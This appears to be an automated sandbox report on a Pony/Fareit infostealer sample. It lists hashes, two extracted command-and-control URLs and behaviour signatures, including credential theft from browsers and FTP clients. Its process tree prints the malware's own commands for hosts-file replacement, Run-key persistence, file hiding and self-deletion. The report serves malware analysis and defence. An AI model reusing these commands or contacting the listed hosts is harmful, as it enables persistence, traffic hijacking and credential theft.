Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06-12-2024 02:31

General

  • Target

    ca98c5d86830c32db732c3e491795e91_JaffaCakes118.exe

  • Size

    84KB

  • MD5

    ca98c5d86830c32db732c3e491795e91

  • SHA1

    1e0cc58b7b8ebcd229ae3028535b78da9bfc1c28

  • SHA256

    f09fa70c0c060b1001372395e01e891c0e317e47c52c89dda46a6ae2463755b1

  • SHA512

    407ae06013a2034a143ba87070b611d3fc16bfa43814c258404b51573b2b5c5105667f0cab7dfac7a87fcf3ce53ef17c5840689d0d35be07d3a54d57c0d836c4

  • SSDEEP

    1536:Zq5Oj9Z76cIZSDIxSh4IzxXdFt4Mj3kGLUOj1UowIfml3RBHDC+gDBSS4FgYOL:U5OjGjSDIxSXtXdFt4MjUcUy3wM+DC+i

Malware Config

Extracted

Family

pony

C2

http://zisakle.info:1654/ero.php

http://bdokesa.info:1654/ero.php

Signatures

  • Pony family
  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Drops file in Drivers directory 3 IoCs
  • Deletes itself 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ca98c5d86830c32db732c3e491795e91_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ca98c5d86830c32db732c3e491795e91_JaffaCakes118.exe"
    1⤵
    • Drops file in Drivers directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2912
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy %WINDIR%\system32\drivers\etc\hosts %WINDIR%\system32\drivers\etc\hosts.sam /Y && at 02:34:00 cmd.exe /c copy %TEMP%\259435263FdOh %WINDIR%\system32\drivers\etc\hosts /Y
      2⤵
      • Drops file in Drivers directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\Windows\SysWOW64\at.exe
        at 02:34:00 cmd.exe /c copy C:\Users\Admin\AppData\Local\Temp\259435263FdOh C:\Windows\system32\drivers\etc\hosts /Y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2272
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\CurrentVersion\Run /v 259435294 /t REG_SZ /d "cmd.exe /c copy %TEMP%\259435263FdOh %WINDIR%\system32\drivers\etc\hosts /Y && attrib +H %WINDIR%\system32\drivers\etc\hosts /f
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1224
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\CurrentVersion\Run /v 259435294 /t REG_SZ /d "cmd.exe /c copy C:\Users\Admin\AppData\Local\Temp\259435263FdOh C:\Windows\system32\drivers\etc\hosts /Y && attrib +H C:\Windows\system32\drivers\etc\hosts /f
        3⤵
        • Adds Run key to start application
        • Hide Artifacts: Hidden Files and Directories
        • System Location Discovery: System Language Discovery
        PID:2448
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping -n 10 127.0.0.1 > NUL && del "C:\Users\Admin\AppData\Local\Temp\ca98c5d86830c32db732c3e491795e91_JaffaCakes118.exe"
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2508
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 10 127.0.0.1
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:3020

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2912-0-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB

  • memory/2912-1-0x0000000000411000-0x0000000000416000-memory.dmp

    Filesize

    20KB

  • memory/2912-2-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB

  • memory/2912-3-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB

  • memory/2912-7-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB

  • memory/2912-8-0x0000000000411000-0x0000000000416000-memory.dmp

    Filesize

    20KB

  • memory/2912-18-0x0000000000411000-0x0000000000416000-memory.dmp

    Filesize

    20KB

  • memory/2912-17-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB